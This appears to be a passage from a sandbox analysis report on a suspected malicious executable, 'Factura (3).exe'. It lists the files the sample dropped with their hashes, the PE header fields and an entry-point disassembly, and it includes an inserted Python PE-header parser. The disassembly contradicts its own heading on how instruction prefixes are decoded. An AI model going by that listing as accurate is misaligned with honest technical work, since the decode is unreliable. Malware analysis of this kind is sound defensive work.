Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.5474212186830443
Encrypted: false
SSDEEP: 192:+jS0zmGPpn0AcannjaVTyoo85WlXxUJlzuiF5Z24lO8n:30CGPKATnnj+TH5gXxULzuiF5Y4lO8n
MD5: 08DC534C411AD21E504431B89C290386
SHA1: 7F06C1E91160574A744B87CC48F6FE42B6AAD0D9
SHA-256: F63C2FAA0DC6D4E1D91F6C5D3A56CC21CBF0F3DE63536D5A1D573585372DDE73
SHA-512: FE0956891B9FAEBF5D306BC49D8FF5C71946541AEFFDE83EB335FA67CD59E62C2700B632B3DC4894FD59E92BCC33D404EC9D17E25A4D166B76483E37BFC1C8BD
Malicious: false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.3.4.6.2.9.8.8.9.7.9.5.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.3.4.6.3.0.2.3.3.5.4.5.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.a.0.d.5.5.7.-.4.9.4.a.-.4.c.e.b.-.8.9.1.1.-.9.7.f.f.c.b.0.b.3.6.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.8.4.2.f.b.b.-.6.6.9.e.-.4.0.2.2.-.a.f.5.7.-.3.4.7.3.9.4.4.9.2.7.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.4.-.0.0.0.1.-.0.0.1.4.-.a.f.8.1.-.6.9.3.f.a.4.a.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8634
                                                    Entropy (8bit):3.7060386100256015
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ4q16YWpRgmfZaw9wIprw89bptUfACjm:R6lXJ116Y4RgmfQwS4pef4
                                                    MD5:E5641796997B8E3691CC1357FC74ABAA
                                                    SHA1:AB212BBFB601338B3123CE83976030404FF655A7
                                                    SHA-256:48BE0EF6C6F1F08593938EBE40DAD6D372B9D9BD323649DC5C216A9E38594ECB
                                                    SHA-512:A516EC52246F8E5E7BE461BA349F65F1493FC3E88C6A8148703744BE3325AC0073CBC6B55720C40539770192CBDA276861A5EA9D675724C8690B8090C218715C
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.2.<./.P.i.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4831
                                                    Entropy (8bit):4.500052590875375
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsvJg771I92BWpW8VYvYm8M4JQ9ExFgfyq8vlEPytfDd:uIjfRI7xQ7VjJQW0fW+PufDd
                                                    MD5:1F5AD32E818E6C07F6DFE331AA3892F9
                                                    SHA1:B5CB35F8411D98EA2AA1C4C1BB321D1E989436CC
                                                    SHA-256:3510BD5B59BAF105BEE3171D6D1CD7B5B9CB97DD90E1B1EFFF03B01D20FAC069
                                                    SHA-512:497D460A92EEE778614B01342F26B1CC709C0019E6CB327DB3DAA876FF0A3F5FF9B8CF20A1C08717B47C52C8A01BAF05783DCFA516375F6E391578CE486979A9
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="325821" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Thu May 16 15:18:21 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):825760
                                                    Entropy (8bit):3.3715716821356314
                                                    Encrypted:false
                                                    SSDEEP:6144:fD3W6xrL+iAHqcD0SPa3Q802hrz9P1QqeJFh9TBQ+NcWc:fzWgmi4qa0SyQ8BhrzpWzJxTK+N1
                                                    MD5:C8E8A1893EBD1C61DBD483A05D79EADD
                                                    SHA1:3D9BAC22D11EC378707D8EBDC39F7E6513751FBF
                                                    SHA-256:4A3BEF2C97C905E63DD2794BD5E69F8EBE259D5D51CBC1422EFD27D7332F17D2
                                                    SHA-512:1B803C393799838118302336C7365CDC9D8DA52B9C167F73B5F5ABB1E457DA1FA37F0588B7009CA5C49F5CB838D2D4BCEBF3ABD1B6412BDB8F318B856E43C3CA
                                                    Malicious:false
                                                    Preview:MDMP..a..... ........#Ff........................\)...........)..d4.....................`.......8...........T............c...6..........H^..........4`..............................................................................eJ.......`......Lw......................T.......D....#Ff.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.0818136700495735
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                    MD5:BCE202BE96167104C292ABBA72DDA325
                                                    SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                    SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                    SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                    Malicious:false
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\SysWOW64\chkdsk.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1221538113908904
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\Factura (3).exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):21008
                                                    Entropy (8bit):7.991553194087344
                                                    Encrypted:true
                                                    SSDEEP:384:O8bV5GYbvtlFXu7HN159ELb0t6Es95HTqJLpdQ+lzK1cF3z81FBYlr:bbGq1lYN159E/DAJd/42Fdr
                                                    MD5:E39D3EA68036A023080210317A6674A7
                                                    SHA1:77CD37A9D2F87699C64B305AD1399C360FA71C58
                                                    SHA-256:D14365650DA0D9D96A3AEF7C07D7B191AA987615ED67EAB3F6C55BAC7D79FCAA
                                                    SHA-512:D4766E9C79CE413B2FA93D3EB2B9F3F806A5DB706B8959F420A9A7B0FC6AB1ED6634916EC3C0C2421DD504BD2152490A1273CEA80D586F516A9A08D79315384B
                                                    Malicious:false
                                                    Preview:*9b.]i.HRe.i........mO..I.l..if............c....|....c".....rz6.s.*....0../E".^..B.q....`.8)..\.9q.....*wQ.4qy..R.....eg.....D.;..A..gV7/.=c.j.tw..*Qv..P~.C.}%.d...@.L..j.*x...}3..#9I.R0.0N?..]...u...4.4...9(...C_..X.....n...v...(?.;.3~d'..J...j.?.../\.."L>K.>...xi.t..........G.B&.\.C.4:yvG....^.@..4.|bG.v.yv.F.P=.4.....S...O...o.+..x..f.....c..k..>.....q..z.....`..../.B...'.........s._..)...._. *:.Yi6.kP.Zy.)....0.W.#..]d.,'.$p...,a...p4......'.w/*......B..-.A.J.{.r.S...O.......p.35........].........S..|.9.+9.V...~c.MHw..y".R.FvwG:..I....yc..F..}b.'.Yl5.i....M.$'.d..(......!.............p...$.^.6..L.e...,f.%..~].o.K.^..@O}....ts.22......#.._..lrssl....5*"......Y.....Mn=:L.~...#.v.:.n....I..[7Q.~......c+.!...!K7..k.*.q.5.-......`Ob.6._.Ux.2.'>yk.^..IS.".T..$.f..3x...\....B6E..(K..&h.4x.....O...K].c..D... ..n..~..6.#.t.....mi...8B2..D...RF.VS.....8.d)y|X..b....w.7...4R..v.W[.AlI..^.b..t.G..=.R...k3.o........s4L......R...F.p.F....e...
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.394804600876613
                                                    Encrypted:false
                                                    SSDEEP:6144:6l4fiJoH0ncNXiUjt10qCG/gaocYGBoaUMMhA2NX4WABlBuNAbOBSqa:q4vFCMYQUMM6VFYSbU
                                                    MD5:E4CD9858665E449E1D3F58639AB7A117
                                                    SHA1:CECC02C723D89F6E8811D41B1DF24472C2E8D3A0
                                                    SHA-256:D66F4C2A006BBC8385D4DA097D7A9BC4733DA7C4D5A522ED6846A46D939F845D
                                                    SHA-512:10E0EB57FDF06A5623BD11097DD7D5D5440A86CCF691C0F26641C0E3008532B7573A57029290B12EFB31AE68417AFD8DAB95DD80C3A58F32740CA1F4943966DC
                                                    Malicious:false
                                                    Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...H.................................................................................................................................................................................................................................................................................................................................................F.|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with very long lines (696), with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):8552
                                                    Entropy (8bit):5.34468812107699
                                                    Encrypted:false
                                                    SSDEEP:96:OMxSVrwxSVCxSYxSuBI0jzlVlVlVA5xSOGRRRCuVUC72mA:OLr/aDDDA1GRRRCuVUC72mA
                                                    MD5:4BCC2E6BA6CEED46BFBE863E223ECC28
                                                    SHA1:4F0BD3943A5B51F0BF452248A53D38F79DA11BBC
                                                    SHA-256:96DABE0B10B682FB76C274B3BD0A40FB0B9B6B8FF702A392C4751F55E32FF039
                                                    SHA-512:BC7763DA47A5B772B5D0F4B9F8016FC0156FCA8E16EE682B9F97B7BBA94F395DC35D5C3533DF4AF0270089D0FB499553D68B9A6519C356A4FE4C995CD01970C3
                                                    Malicious:false
                                                    Preview:.Unhandled Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt... at _SA._RB(String , String , IntPtr , IntPtr , Boolean , UInt32 , IntPtr , String , IntPtr , IntPtr ).. --- End of inner exception stack trace ---.. at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor).. at System.Reflection.Runtim
                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                    Entropy (8bit):7.404079699333802
                                                    TrID:
                                                    • Win64 Executable Console (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Factura (3).exe
                                                    File size:1'034'668 bytes
                                                    MD5:367f6a9b9b00f860281fe3865a0d33f0
                                                    SHA1:b82f862d256fd63ceb31982178b35f31670a13d3
                                                    SHA256:0b5726f67e41a222543e4bc949db567350231b5dd0c791d72ce2005e0a5af704
                                                    SHA512:d707ad47a974e55f8f7cc91969af01c22aa6ab758c41320b9f93398e3ff1cb5b26e64e74ed979c1b2939e1ce252278e18186a9b6e60ebc54634d58f07a2fc392
                                                    SSDEEP:12288:42hb+TTZEcmgH5KqlyUNbG1pxUz5i9SkO0a5t35kZUh1EEREmbm/8b+miXnsJ9nI:4ab+hHQqqwzI9yJkZA4ECmmsJpaWA
                                                    TLSH:E025E041B7AC54F4D4B7D1388982650AFBA17C568360DBDB67A04A5B1F236E0BD3EF80
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cz..'.h.'.h.'.h.lck.!.h.lcm...h.lcl.7.h.'.h.&.h.lci.$.h.'.i.D.h.!.l.7.h.!.k.5.h.!.m.u.h.I.m.&.h.I.j.&.h.Rich'.h................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x140017cec
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows cui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6644A30B [Wed May 15 11:56:59 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:daf5c93667eaae2edfeefaa93a963f14
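The static fields above (time stamp, image base, entry point, subsystem, characteristics) come straight out of the COFF and PE32+ optional headers. The following is an added example, not code from the Joe Sandbox report or from the sample, that walks those headers, decodes the flag words into the names the report prints, and lists which standard mitigations are absent (here GUARD_CF, which the DLL Characteristics line does not include). The header blob it parses is constructed by hand from the values the report shows for Factura (3).exe; it is not a copy of bytes from the file, so section tables and other structures are deliberately missing.

```python
"""Decode the static PE header fields a sandbox report lists and flag
missing exploit mitigations.

Added example; not code from the Joe Sandbox report or from the sample.
build_sample_header() constructs a PE32+ header from the values the
report shows (entry point 0x140017cec, image base 0x140000000, time
stamp 0x6644A30B, subsystem "windows cui", DLL characteristics
HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|TERMINAL_SERVER_AWARE); it is
not the real file's bytes.
"""
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32PLUS_MAGIC = 0x20B
COFF_HEADER_SIZE = 20

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}
# Mitigations a current MSVC link is expected to carry; anything absent is worth noting.
EXPECTED_MITIGATIONS = ("DYNAMIC_BASE", "HIGH_ENTROPY_VA", "NX_COMPAT", "GUARD_CF")


def _flag_names(value: int, table: dict) -> list:
    """Expand a bit-flag word into the symbolic names, in ascending bit order."""
    return [name for bit, name in table.items() if value & bit]


def parse_pe_headers(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> PE32+ optional header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    machine, _nsections, timestamp, _symtab, _nsyms, _opt_size, file_chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + COFF_HEADER_SIZE
    if struct.unpack_from("<H", data, opt)[0] != PE32PLUS_MAGIC:
        raise ValueError("only PE32+ (64-bit) optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]     # ImageBase (8 bytes in PE32+)
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    dll_names = _flag_names(dll_chars, DLL_CHARACTERISTICS)
    return {
        "machine_amd64": machine == IMAGE_FILE_MACHINE_AMD64,
        # TimeDateStamp is seconds since the Unix epoch; the linker writes it, so it can be forged.
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "file_characteristics": _flag_names(file_chars, FILE_CHARACTERISTICS),
        "image_base": image_base,
        "entrypoint": image_base + entry_rva,
        "os_version": f"{os_major}.{os_minor}",
        "subsystem": SUBSYSTEMS.get(subsystem, f"unknown ({subsystem})"),
        "dll_characteristics": dll_names,
        "missing_mitigations": [m for m in EXPECTED_MITIGATIONS if m not in dll_names],
    }


def build_sample_header() -> bytes:
    """Constructed PE32+ header carrying the values the report lists (not the real file bytes)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, SymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 6, 0x6644A30B, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 16, 0x17CEC)          # AddressOfEntryPoint (RVA)
    struct.pack_into("<Q", opt, 24, 0x140000000)      # ImageBase
    struct.pack_into("<HH", opt, 40, 6, 0)            # MajorOperatingSystemVersion / Minor
    struct.pack_into("<HH", opt, 48, 6, 0)            # MajorSubsystemVersion / Minor
    struct.pack_into("<HH", opt, 68, 3, 0x8160)       # Subsystem = CUI, DllCharacteristics
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for key, value in parse_pe_headers(build_sample_header()).items():
        print(f"{key:>22}: {value}")
```

Run it against a real file by replacing build_sample_header() with open(path, "rb").read(); the parser only touches the headers, so the whole file can be passed in. The time stamp decode reproduces the report's "Wed May 15 11:56:59 2024 UTC", but treat it as a hint only, since the field is under the author's control.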
                                                    Instruction (x86-64 decode; the binary is PE32+, so the 48h/41h/44h/45h REX prefixes belong to the following instructions rather than standing alone as dec/inc)
                                                    sub rsp, 28h
                                                    call 00007F580C7D2B94h
                                                    add rsp, 28h
                                                    jmp 00007F580C7D2357h
                                                    int3
                                                    int3
                                                    retn 0000h
                                                    int3
                                                    mov qword ptr [rsp+10h], rbx
                                                    mov qword ptr [rsp+18h], rsi
                                                    push rdi
                                                    sub rsp, 10h
                                                    xor eax, eax
                                                    xor ecx, ecx
                                                    cpuid
                                                    mov r8d, ecx
                                                    xor r11d, r11d
                                                    mov r10d, edx
                                                    xor r8d, 6C65746Eh
                                                    xor r10d, 49656E69h
                                                    mov r9d, ebx
                                                    mov esi, eax
                                                    xor ecx, ecx
                                                    lea eax, dword ptr [r11+01h]
                                                    or r10d, r8d
                                                    cpuid
                                                    xor r9d, 756E6547h
                                                    mov dword ptr [rsp], eax
                                                    or r10d, r9d
                                                    mov dword ptr [rsp+04h], ebx
                                                    mov edi, ecx
                                                    mov dword ptr [rsp+08h], ecx
                                                    mov dword ptr [rsp+0Ch], edx
                                                    jne 00007F580C7D253Dh
                                                    or qword ptr [rip+00049BBBh], FFFFFFFFFFFFFFFFh
                                                    and eax, 0FFF3FF0h
                                                    mov qword ptr [rip+00049BA3h], 00008000h
                                                    cmp eax, 000106C0h
                                                    je 00007F580C7D250Ah
                                                    cmp eax, 00020660h
                                                    je 00007F580C7D2503h
                                                    cmp eax, 00020670h
                                                    je 00007F580C7D24FCh
                                                    add eax, FFFCF9B0h
                                                    cmp eax, 20h
                                                    jnbe 00007F580C7D2506h
                                                    dec eax
                                                    mov ecx, 00010001h
                                                    add dword ptr [eax], eax
                                                    add byte ptr [eax], al
                                                    dec eax
                                                    bt ecx, eax
                                                    jnc 00007F580C7D24F6h
                                                    inc esp
                                                    mov eax, dword ptr [0004B31Dh]
                                                    inc ecx
                                                    or eax, 01h
                                                    inc esp
                                                    mov dword ptr [0000B312h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
